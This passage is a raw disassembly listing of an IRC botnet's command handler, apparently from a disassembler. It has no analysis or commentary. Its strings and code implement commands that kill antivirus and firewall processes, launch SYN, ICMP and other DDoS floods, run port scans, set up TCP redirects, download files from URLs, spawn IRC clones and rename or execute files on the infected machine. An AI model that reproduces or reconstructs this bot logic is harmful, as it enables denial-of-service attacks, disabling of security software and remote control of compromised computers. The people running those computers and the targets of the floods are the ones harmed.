push offset aNetUserListFai ; "[NET]: User list failed."
jmp short loc_40B95B
; ---------------------------------------------------------------------------
loc_40B909: ; CODE XREF: sub_409848+2033�j
push 5
mov edi, edx
mov esi, offset aSend ; "send"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40B950
cmp [ebp+var_10], eax
jz short loc_40B949
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40822F
push eax
lea eax, [ebp+var_2F0]
push offset aS_2 ; "%s"
push eax
call sub_416975
add esp, 1Ch
jmp short loc_40B963
; ---------------------------------------------------------------------------
loc_40B949: ; CODE XREF: sub_409848+20D4�j
push offset aNetNoMessageSp ; "[NET]: No message specified."
jmp short loc_40B955
; ---------------------------------------------------------------------------
loc_40B950: ; CODE XREF: sub_409848+20CF�j
push offset aNetCommandUnkn ; "[NET]: Command unknown."
loc_40B955: ; CODE XREF: sub_409848+1EA3�j
; sub_409848+2106�j ...
lea eax, [ebp+var_2F0]
loc_40B95B: ; CODE XREF: sub_409848+1F30�j
; sub_409848+1F3A�j ...
push eax
call sub_416975
pop ecx
pop ecx
loc_40B963: ; CODE XREF: sub_409848+1EAB�j
; sub_409848+1F08�j ...
cmp [ebp+var_C], 0
jnz loc_40AF34
push 0
jmp loc_40AF19
; ---------------------------------------------------------------------------
loc_40B974: ; CODE XREF: sub_409848+1E86�j
push 8
mov edi, eax
mov esi, offset aCapture ; "capture"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D2DF
push 4
mov edi, eax
mov esi, offset aCap ; "cap"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D2DF
push 8
mov edi, eax
mov esi, offset aGethost ; "gethost"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D1FA
push 3
mov edi, eax
mov esi, offset aGh ; "gh"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D1FA
push 0Bh
mov edi, eax
mov esi, offset aAvfwkiller ; "avfwkiller"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40BACA
mov edi, [ebp+var_8]
push 6
mov esi, offset aStart ; "start"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40BA9D
lea eax, [ebp+var_2F0]
push offset aAvfwAvFwBotKil ; "[AVFW]: AV/FW/BOT Killer active."
push eax
call sub_416975
push [ebp+ebx+var_9C]
xor edi, edi
push 1
push offset aKillerThread ; "Killer Thread"
push offset aAvfw ; "[AVFW]"
push 1
push edi
push [ebp+var_9C]
push [ebp+arg_4]
call sub_413968
push edi
lea eax, [ebp+var_2F0]
push 1
push eax
call sub_413732
add esp, 34h
mov esi, eax
lea eax, [ebp+var_18]
push eax
push edi
push edi
push offset sub_40915E
push edi
push edi
call dword_42200C ; CreateThread
imul esi, 234h
cmp eax, edi
mov dword_43B274[esi], eax
jnz short loc_40BA76
call dword_422008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aAvfwFailedToSt ; "[AVFW]: Failed to start AV/FW killer th"...
push eax
call sub_416975
add esp, 0Ch
loc_40BA76: ; CODE XREF: sub_409848+2211�j
lea eax, [ebp+var_2F0]
push eax
call sub_401F0F
cmp [ebp+var_C], edi
pop ecx
jnz loc_409AC6
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
jmp loc_40E5C8
; ---------------------------------------------------------------------------
loc_40BA9D: ; CODE XREF: sub_409848+219F�j
mov edi, [ebp+var_8]
push 5
mov esi, offset aStop ; "stop"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_409AC6
push [ebp+ebx+var_9C]
push 1
push offset aKillerThread ; "Killer Thread"
push offset aAvfw ; "[AVFW]"
jmp loc_40EB09
; ---------------------------------------------------------------------------
loc_40BACA: ; CODE XREF: sub_409848+218A�j
mov ecx, [ebp+ebx+var_9C]
test ecx, ecx
mov [ebp+var_10], ecx
jz loc_409AC6
push 9
mov edi, eax
mov esi, offset aAddalias ; "addalias"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D187
push 3
mov edi, eax
mov esi, offset aAa ; "aa"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D187
push 8
mov edi, eax
mov esi, offset aPrivmsg_0 ; "privmsg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D11C
push 3
mov edi, eax
mov esi, offset aPm_0 ; "pm"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D11C
push 7
mov edi, eax
mov esi, offset aAction ; "action"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D099
push 2
mov edi, eax
mov esi, offset aA_1 ; "a"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D099
push 6
mov edi, eax
mov esi, offset aCycle ; "cycle"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D033
push 3
mov edi, eax
mov esi, offset aCy ; "cy"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D033
push 5
mov edi, eax
mov esi, offset aMode ; "mode"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CFF9
push 2
mov edi, eax
mov esi, offset aM ; "m"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CFF9
push 6
mov edi, eax
mov esi, offset aC_raw ; "c_raw"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CF8A
push 4
mov edi, eax
mov esi, offset aC_r ; "c_r"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CF8A
push 7
mov edi, eax
mov esi, offset aC_mode ; "c_mode"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CF04
push 4
mov edi, eax
mov esi, offset aC_m ; "c_m"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CF04
push 7
mov edi, eax
mov esi, offset aC_nick ; "c_nick"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CE93
push 4
mov edi, eax
mov esi, offset aC_n ; "c_n"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CE93
push 7
mov edi, eax
mov esi, offset aC_join ; "c_join"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CE6B
push 4
mov edi, eax
mov esi, offset aC_j ; "c_j"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CE6B
push 7
mov edi, eax
mov esi, offset aC_part ; "c_part"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CE05
push 4
mov edi, eax
mov esi, offset aC_p ; "c_p"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CE05
push 7
mov edi, eax
mov esi, offset aRepeat ; "repeat"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CD41
push 3
mov edi, eax
mov esi, offset aRp ; "rp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CD41
push 6
mov edi, eax
mov esi, offset aDelay ; "delay"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CCA4
push 3
mov edi, eax
mov esi, offset aDe ; "de"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CCA4
push 7
mov edi, eax
mov esi, offset aUpdate ; "update"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CAE0
push 3
mov edi, eax
mov esi, offset aUp ; "up"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CAE0
push 8
mov edi, eax
mov esi, offset aExecute ; "execute"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CA3D
push 2
mov edi, eax
mov esi, offset aE ; "e"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CA3D
push 9
mov edi, eax
mov esi, offset aFindfile ; "findfile"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C92D
push 3
mov edi, eax
mov esi, offset aFf ; "ff"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C92D
push 7
mov edi, eax
mov esi, offset aRename ; "rename"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C8D5
push 3
mov edi, eax
mov esi, offset aMv ; "mv"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C8D5
push 0Ah
mov edi, eax
mov esi, offset aIcmpflood ; "icmpflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C7A3
push 5
mov edi, eax
mov esi, offset aIcmp ; "icmp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C7A3
mov ecx, [ebp+ebx+var_98]
test ecx, ecx
mov [ebp+arg_0], ecx
jz loc_409AC6
push 6
mov edi, eax
mov esi, offset aClone_0 ; "clone"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C6B5
push 2
mov edi, eax
mov esi, offset aC ; "c"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C6B5
push 9
mov edi, eax
mov esi, offset aDdos_syn ; "ddos.syn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C592
push 9
mov edi, eax
mov esi, offset aDdos_ack ; "ddos.ack"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C592
push 0Ch
mov edi, eax
mov esi, offset aDdos_random ; "ddos.random"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C592
push 9
mov edi, eax
mov esi, offset aSynflood ; "synflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C4A5
push 4
mov edi, eax
mov esi, offset aSyn ; "syn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C4A5
push 9
mov edi, eax
mov esi, offset aDownload ; "download"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C303
push 3
mov edi, eax
mov esi, offset aDl ; "dl"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C303
push 9
mov edi, eax
mov esi, offset aRedirect ; "redirect"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C206
push 3
mov edi, eax
mov esi, offset aRd ; "rd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C206
push 5
mov edi, eax
mov esi, offset aScan ; "scan"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C110
push 3
mov edi, eax
mov esi, offset aSc ; "sc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C110
push 0Ah
mov edi, eax
mov esi, offset aC_privmsg ; "c_privmsg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C01A
push 5
mov edi, eax
mov esi, offset aC_pm ; "c_pm"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C01A
push 9
mov edi, eax
mov esi, offset aC_action ; "c_action"
pop ecx
xor edx, edx
repe cmpsb
jz short loc_40BEE6
push 4
mov edi, eax
mov esi, offset dword_429D58
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40AC9B
loc_40BEE6: ; CODE XREF: sub_409848+2688�j
push [ebp+var_8]
call sub_416D02
imul eax, 234h
cmp byte_43B278[eax], 0
pop ecx
jz loc_40F93F
mov edi, [ebp+var_14]
test edi, edi
jz loc_40F93F
mov eax, [ebp+var_1C]
lea edx, [eax+1]
loc_40BF13: ; CODE XREF: sub_409848+26D0�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40BF13
sub eax, edx
mov ebx, eax
mov eax, [ebp+var_8]
lea ecx, [eax+1]
loc_40BF24: ; CODE XREF: sub_409848+26E1�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40BF24
sub eax, ecx
mov ecx, eax
mov eax, [ebp+var_10]
lea esi, [eax+1]
loc_40BF35: ; CODE XREF: sub_409848+26F2�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40BF35
push [ebp+arg_0]
sub eax, esi
add eax, ecx
add eax, ebx
lea eax, [eax+edi+2]
push eax
call sub_417440
mov esi, eax
push esi
lea eax, [ebp+var_2F0]
push offset dword_429D4C
push eax
call sub_416975
add esp, 14h
test esi, esi
jz loc_40F93F
mov edi, [ebp+var_8]
push edi
call sub_416D02
test eax, eax
pop ecx
jle loc_40F93F
push edi
call sub_416D02
cmp eax, 1F4h
pop ecx
jge loc_40F93F
xor ebx, ebx
push ebx
push ebx
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_10]
push edi
call sub_416D02
imul eax, 234h
pop ecx
push dword_43B26C[eax]
call sub_405D62
push edi
call sub_416D02
imul eax, 234h
add esp, 18h
cmp byte ptr dword_43B060[eax], 73h
jnz loc_40F93F
push esi
push edi
call sub_416D02
imul eax, 234h
pop ecx
add eax, offset byte_43B278
push eax
push [ebp+var_10]
push offset aSSS_2 ; "[%s] * %s %s"
loc_40BFF0: ; CODE XREF: sub_409848+28C3�j
lea eax, [ebp+var_2F0]
push eax
call sub_416975
push ebx
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
jmp loc_40E5A0
; ---------------------------------------------------------------------------
loc_40C01A: ; CODE XREF: sub_409848+2660�j
; sub_409848+2674�j
push [ebp+var_8]
call sub_416D02
imul eax, 234h
cmp byte_43B278[eax], 0
pop ecx
jz loc_40F93F
mov edi, [ebp+var_14]
test edi, edi
jz loc_40F93F
mov eax, [ebp+var_1C]
lea edx, [eax+1]
loc_40C047: ; CODE XREF: sub_409848+2804�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40C047
sub eax, edx
mov ebx, eax
mov eax, [ebp+var_8]
lea ecx, [eax+1]
loc_40C058: ; CODE XREF: sub_409848+2815�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40C058
sub eax, ecx
mov ecx, eax
mov eax, [ebp+var_10]
lea esi, [eax+1]
loc_40C069: ; CODE XREF: sub_409848+2826�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40C069
push [ebp+arg_0]
sub eax, esi
add eax, ecx
add eax, ebx
lea eax, [eax+edi+2]
push eax
call sub_417440
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40F93F
mov edi, [ebp+var_8]
push edi
call sub_416D02
test eax, eax
pop ecx
jle loc_40F93F
push edi
call sub_416D02
cmp eax, 1F4h
pop ecx
jge loc_40F93F
xor ebx, ebx
push ebx
push ebx
push esi
push [ebp+var_10]
push edi
call sub_416D02
imul eax, 234h
pop ecx
push dword_43B26C[eax]
call sub_405D62
push edi
call sub_416D02
imul eax, 234h
add esp, 18h
cmp byte ptr dword_43B060[eax], 73h
jnz loc_40F93F
push esi
push edi
call sub_416D02
imul eax, 234h
pop ecx
add eax, offset byte_43B278
push eax
push [ebp+var_10]
push offset aSSS_1 ; "[%s] <%s> %s"
jmp loc_40BFF0
; ---------------------------------------------------------------------------
loc_40C110: ; CODE XREF: sub_409848+2638�j
; sub_409848+264C�j
push [ebp+var_8]
call dword_43A434 ; inet_addr
push [ebp+var_10]
mov [ebp+var_408], eax
call sub_416D02
push [ebp+arg_0]
mov [ebp+var_414], eax
call sub_416D02
mov edi, [ebp+arg_4]
push 7Fh
push [ebp+var_9C]
mov [ebp+var_410], eax
lea eax, [ebp+var_494]
push eax
mov [ebp+var_498], edi
call sub_416A00
mov eax, [ebp+var_C]
mov ebx, [ebp+var_4]
add esp, 14h
push [ebp+var_410]
mov [ebp+var_400], ebx
push [ebp+var_414]
mov [ebp+var_3FC], eax
push [ebp+var_408]
call dword_43A440 ; inet_ntoa
push eax
lea eax, [ebp+var_2F0]
push offset aScanPortScanSt ; "[SCAN]: Port scan started: %s:%d with d"...
push eax
call sub_416975
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 9
push eax
call sub_413732
add esp, 20h
mov [ebp+var_40C], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_498]
push eax
push offset sub_411263
push esi
push esi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_40C]
imul ecx, 234h
cmp eax, esi
mov dword_43B274[ecx], eax
jnz short loc_40C1F9
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan thread, er"...
jmp loc_40C676
; ---------------------------------------------------------------------------
loc_40C1F1: ; CODE XREF: sub_409848+29B7�j
push 32h
call dword_422000 ; Sleep
loc_40C1F9: ; CODE XREF: sub_409848+2996�j
cmp [ebp+var_3F8], esi
jz short loc_40C1F1
jmp loc_40C685
; ---------------------------------------------------------------------------
loc_40C206: ; CODE XREF: sub_409848+2610�j
; sub_409848+2624�j
push [ebp+var_8]
call sub_416D02
push 7Fh
push [ebp+var_10]
mov [ebp+var_F0C], eax
lea eax, [ebp+var_1010]
push eax
call sub_416A00
push [ebp+arg_0]
call sub_416D02
push [ebp+var_9C]
mov esi, [ebp+arg_4]
mov [ebp+var_F10], eax
lea eax, [ebp+var_F90]
push 80h
push eax
mov [ebp+var_1018], esi
call sub_416BCD
mov eax, [ebp+var_C]
mov ebx, [ebp+var_4]
add esp, 20h
push [ebp+var_F10]
mov [ebp+var_EFC], eax
lea eax, [ebp+var_1010]
push eax
push [ebp+var_F0C]
mov [ebp+var_F00], ebx
push esi
call sub_408894
pop ecx
push eax
lea eax, [ebp+var_2F0]
push offset aRedirectTcpRed ; "[REDIRECT]: TCP redirect created from: "...
push eax
call sub_416975
xor edi, edi
push edi
lea eax, [ebp+var_2F0]
push 11h
push eax
call sub_413732
add esp, 24h
mov [ebp+var_F08], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_1018]
push eax
push offset sub_41031F
push edi
push edi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_F08]
imul ecx, 234h
cmp eax, edi
mov dword_43B274[ecx], eax
jnz short loc_40C2F6
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aRedirectFailed ; "[REDIRECT]: Failed to start redirection"...
jmp loc_40C466
; ---------------------------------------------------------------------------
loc_40C2EE: ; CODE XREF: sub_409848+2AB4�j
push 32h
call dword_422000 ; Sleep
loc_40C2F6: ; CODE XREF: sub_409848+2A93�j
cmp [ebp+var_EF8], edi
jz short loc_40C2EE
jmp loc_40C475
; ---------------------------------------------------------------------------
loc_40C303: ; CODE XREF: sub_409848+25E8�j
; sub_409848+25FC�j
mov esi, 0FFh
push esi
push [ebp+var_8]
lea eax, [ebp+var_E14]
push eax
call sub_416A00
push [ebp+arg_0]
xor edi, edi
mov [ebp+var_B10], edi
call sub_416D02
mov [ebp+var_B0C], eax
mov eax, [ebp+ebx+var_94]
add esp, 10h
cmp eax, edi
jz short loc_40C350
push 10h
push edi
push eax
call sub_417799
add esp, 0Ch
mov [ebp+var_B04], eax
jmp short loc_40C356
; ---------------------------------------------------------------------------
loc_40C350: ; CODE XREF: sub_409848+2AF2�j
mov [ebp+var_B04], edi
loc_40C356: ; CODE XREF: sub_409848+2B06�j
mov ebx, [ebp+ebx+var_90]
cmp ebx, edi
jz short loc_40C370
push ebx
call sub_416D02
pop ecx
mov [ebp+var_B08], eax
jmp short loc_40C376
; ---------------------------------------------------------------------------
loc_40C370: ; CODE XREF: sub_409848+2B17�j
mov [ebp+var_B08], edi
loc_40C376: ; CODE XREF: sub_409848+2B26�j
push 3Fh
push [ebp+var_10]
call sub_417E80
mov ebx, eax
cmp ebx, edi
pop ecx
pop ecx
jz short loc_40C3B0
and byte ptr [ebx], 0
inc ebx
loc_40C38C: ; CODE XREF: sub_409848+2B55�j
push 26h
push ebx
call sub_417E80
cmp eax, edi
pop ecx
pop ecx
jz short loc_40C39F
mov byte ptr [eax], 20h
jmp short loc_40C38C
; ---------------------------------------------------------------------------
loc_40C39F: ; CODE XREF: sub_409848+2B50�j
push esi
lea eax, [ebp+var_C14]
push ebx
push eax
call sub_416A00
add esp, 0Ch
loc_40C3B0: ; CODE XREF: sub_409848+2B3E�j
push esi
push [ebp+var_10]
lea eax, [ebp+var_D14]
push eax
call sub_416A00
movzx eax, [ebp+var_38B]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_9C]
mov [ebp+var_B00], eax
lea eax, [ebp+var_E94]
push eax
mov [ebp+var_E98], esi
call sub_416A00
push [ebp+var_10]
mov eax, [ebp+var_C]
push [ebp+var_8]
mov ebx, [ebp+var_4]
mov [ebp+var_AFC], eax
lea eax, [ebp+var_2F0]
push offset aDownloadDown_1 ; "[DOWNLOAD]: Downloading URL: %s to: %s."...
push eax
mov [ebp+var_AF8], ebx
call sub_416975
push esi
lea eax, [ebp+var_2F0]
push 16h
push eax
call sub_413732
add esp, 34h
mov [ebp+var_B14], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_E98]
push eax
push offset sub_402C71
push edi
push edi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_B14]
imul ecx, 234h
cmp eax, edi
mov dword_43B274[ecx], eax
jnz short loc_40C49B
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aDownloadFailed ; "[DOWNLOAD]: Failed to start transfer th"...
loc_40C466: ; CODE XREF: sub_409848+2AA1�j
; sub_409848+4A38�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_416975
add esp, 0Ch
loc_40C475: ; CODE XREF: sub_409848+2AB6�j
; sub_409848+2C5B�j ...
cmp [ebp+var_C], edi
jnz loc_40EE4D
push edi
push ebx
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push esi
jmp loc_40EE45
; ---------------------------------------------------------------------------
loc_40C493: ; CODE XREF: sub_409848+2C59�j
push 32h
call dword_422000 ; Sleep
loc_40C49B: ; CODE XREF: sub_409848+2C10�j
cmp [ebp+var_AF4], edi
jz short loc_40C493
jmp short loc_40C475
; ---------------------------------------------------------------------------
loc_40C4A5: ; CODE XREF: sub_409848+25C0�j
; sub_409848+25D4�j
push 7Fh
pop esi
push esi
push [ebp+var_8]
lea eax, [ebp+var_1A68]
push eax
call sub_416A00
push esi
push [ebp+var_10]
lea eax, [ebp+var_19E8]
push eax
call sub_416A00
push esi
push [ebp+arg_0]
lea eax, [ebp+var_1968]
push eax
call sub_416A00
push esi
push [ebp+var_9C]
lea eax, [ebp+var_18E8]
push eax
call sub_416A00
push [ebp+arg_0]
mov eax, [ebp+var_C]
push [ebp+var_10]
mov ebx, [ebp+var_4]
push [ebp+var_8]
mov edi, [ebp+arg_4]
mov [ebp+var_1860], eax
lea eax, [ebp+var_2F0]
push offset aSynFloodingSSF ; "[SYN]: Flooding: (%s:%s) for %s seconds"...
push eax
mov [ebp+var_1864], ebx
mov [ebp+var_1A6C], edi
call sub_416975
add esp, 44h
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 0Ch
push eax
call sub_413732
add esp, 0Ch
mov [ebp+var_1868], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_1A6C]
push eax
push offset sub_41294E
push esi
push esi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_1868]
imul ecx, 234h
cmp eax, esi
mov dword_43B274[ecx], eax
jnz short loc_40C585
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aSynFailedToSta ; "[SYN]: Failed to start flood thread, er"...
jmp loc_40C676
; ---------------------------------------------------------------------------
loc_40C57D: ; CODE XREF: sub_409848+2D43�j
push 32h
call dword_422000 ; Sleep
loc_40C585: ; CODE XREF: sub_409848+2D22�j
cmp [ebp+var_185C], esi
jz short loc_40C57D
jmp loc_40C685
; ---------------------------------------------------------------------------
loc_40C592: ; CODE XREF: sub_409848+2584�j
; sub_409848+2598�j ...
push 7Fh
pop esi
push esi
push [ebp+var_8]
lea eax, [ebp+var_1CF8]
push eax
call sub_416A00
push esi
push [ebp+var_10]
lea eax, [ebp+var_1C78]
push eax
call sub_416A00
push esi
push [ebp+arg_0]
lea eax, [ebp+var_1BF8]
push eax
call sub_416A00
push esi
push [ebp+var_9C]
lea eax, [ebp+var_1B78]
push eax
call sub_416A00
push 20h
push [ebp+var_1C]
lea eax, [ebp+var_1AF8]
push eax
call sub_416A00
push [ebp+arg_0]
mov eax, [ebp+var_C]
push [ebp+var_10]
mov ebx, [ebp+var_4]
push [ebp+var_8]
mov edi, [ebp+arg_4]
mov [ebp+var_1A74], eax
lea eax, [ebp+var_2F0]
push offset aDdosFloodingSS ; "[DDoS]: Flooding: (%s:%s) for %s second"...
push eax
mov [ebp+var_1A78], ebx
mov [ebp+var_1D00], edi
call sub_416975
add esp, 50h
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 0Bh
push eax
call sub_413732
add esp, 0Ch
mov [ebp+var_1CFC], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_1D00]
push eax
push offset sub_402BA3
push esi
push esi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_1CFC]
imul ecx, 234h
cmp eax, esi
mov dword_43B274[ecx], eax
jnz short loc_40C6AB
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aDdosFailedToSt ; "[DDoS]: Failed to start flood thread, e"...
loc_40C676: ; CODE XREF: sub_409848+29A4�j
; sub_409848+2D30�j
lea eax, [ebp+var_2F0]
push eax
call sub_416975
add esp, 0Ch
loc_40C685: ; CODE XREF: sub_409848+29B9�j
; sub_409848+2D45�j ...
cmp [ebp+var_C], esi
jnz loc_40EE4D
push esi
push ebx
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push edi
jmp loc_40EE45
; ---------------------------------------------------------------------------
loc_40C6A3: ; CODE XREF: sub_409848+2E69�j
push 32h
call dword_422000 ; Sleep
loc_40C6AB: ; CODE XREF: sub_409848+2E20�j
cmp [ebp+var_1A70], esi
jz short loc_40C6A3
jmp short loc_40C685
; ---------------------------------------------------------------------------
loc_40C6B5: ; CODE XREF: sub_409848+255C�j
; sub_409848+2570�j
push 7Fh
push [ebp+var_8]
lea eax, [ebp+var_16C0]
push eax
call sub_416A00
push [ebp+var_10]
call sub_416D02
push 3Fh
push [ebp+arg_0]
mov [ebp+var_1570], eax
lea eax, [ebp+var_1640]
push eax
call sub_416A00
mov ebx, [ebp+ebx+var_94]
xor esi, esi
add esp, 1Ch
cmp ebx, esi
jz short loc_40C707
push 3Fh
lea eax, [ebp+var_1600]
push ebx
push eax
call sub_416A00
add esp, 0Ch
loc_40C707: ; CODE XREF: sub_409848+2EAB�j
lea eax, [ebp+var_1640]
push eax
push [ebp+var_1570]
lea eax, [ebp+var_16C0]
push eax
lea eax, [ebp+var_2F0]
push offset aClonesCreatedO ; "[CLONES]: Created on %s:%d, in channel "...
push eax
mov [ebp+var_156C], 1
call sub_416975
push esi
lea eax, [ebp+var_2F0]
push 18h
push eax
call sub_413732
add esp, 20h
mov [ebp+var_1568], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_16C4]
push eax
push offset sub_4096E9
push esi
push esi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_1568]
imul ecx, 234h
cmp eax, esi
mov dword_43B274[ecx], eax
jnz short loc_40C796
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aClonesFailedTo ; "[CLONES]: Failed to start clone thread,"...
jmp loc_40D861
; ---------------------------------------------------------------------------
loc_40C78E: ; CODE XREF: sub_409848+2F54�j
push 32h
call dword_422000 ; Sleep
loc_40C796: ; CODE XREF: sub_409848+2F33�j
cmp [ebp+var_1564], esi
jz short loc_40C78E
jmp loc_40D870
; ---------------------------------------------------------------------------
loc_40C7A3: ; CODE XREF: sub_409848+2522�j
; sub_409848+2536�j
push [ebp+var_10]
call sub_416D02
mov ebx, [ebp+arg_4]
xor edi, edi
cmp eax, edi
pop ecx
mov [ebp+var_904], eax
jle loc_40C8A2
push [ebp+var_8]
mov esi, 80h
lea eax, [ebp+var_A8C]
push esi
push eax
call sub_416BCD
push [ebp+var_9C]
xor eax, eax
cmp byte ptr [ebp+var_380+2], al
push esi
setnz al
mov [ebp+var_A90], ebx
mov [ebp+var_900], eax
lea eax, [ebp+var_98C]
push eax
call sub_416BCD
push [ebp+var_10]
mov eax, [ebp+var_4]
push [ebp+var_8]
mov [ebp+var_8FC], eax
mov eax, [ebp+var_C]
push offset aIcmpFloodingSF ; "[ICMP]: Flooding: (%s) for %s seconds."
mov [ebp+var_8F8], eax
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_416BCD
push edi
lea eax, [ebp+var_2F0]
push 0Eh
push eax
call sub_413732
add esp, 38h
mov [ebp+var_90C], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_A90]
push eax
push offset sub_4059CE
push edi
push edi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_90C]
imul ecx, 234h
cmp eax, edi
mov dword_43B274[ecx], eax
jnz short loc_40C898
call dword_422008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aIcmpFailedToSt ; "[ICMP]: Failed to start flood thread, e"...
push eax
call sub_416975
add esp, 0Ch
jmp short loc_40C8B5
; ---------------------------------------------------------------------------
loc_40C890: ; CODE XREF: sub_409848+3056�j
push 32h
call dword_422000 ; Sleep
loc_40C898: ; CODE XREF: sub_409848+3029�j
cmp [ebp+var_8F4], edi
jz short loc_40C890
jmp short loc_40C8B5
; ---------------------------------------------------------------------------
loc_40C8A2: ; CODE XREF: sub_409848+2F71�j
lea eax, [ebp+var_2F0]
push offset aIcmpInvalidFlo ; "[ICMP]: Invalid flood time must be grea"...
push eax
call sub_416975
pop ecx
pop ecx
loc_40C8B5: ; CODE XREF: sub_409848+3046�j
; sub_409848+3058�j
cmp [ebp+var_C], edi
jnz loc_40EE4D
push edi
push [ebp+var_4]
loc_40C8C2: ; CODE XREF: sub_409848+5C55�j
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push ebx
jmp loc_40EE45
; ---------------------------------------------------------------------------
loc_40C8D5: ; CODE XREF: sub_409848+24FA�j
; sub_409848+250E�j
push [ebp+var_10]
push [ebp+var_8]
call dword_4220F4 ; MoveFileA
test eax, eax
jz short loc_40C909
push [ebp+var_10]
lea eax, [ebp+var_2F0]
push [ebp+var_8]
push offset aFileRenameSToS ; "[FILE]: Rename: '%s' to: '%s'."
push 200h
push eax
call sub_416BCD
add esp, 14h
jmp loc_40EE2A
; ---------------------------------------------------------------------------
loc_40C909: ; CODE XREF: sub_409848+309B�j
push offset aFile_0 ; "[FILE]:"
call sub_407369
push eax
lea eax, [ebp+var_2F0]
push 200h
push eax
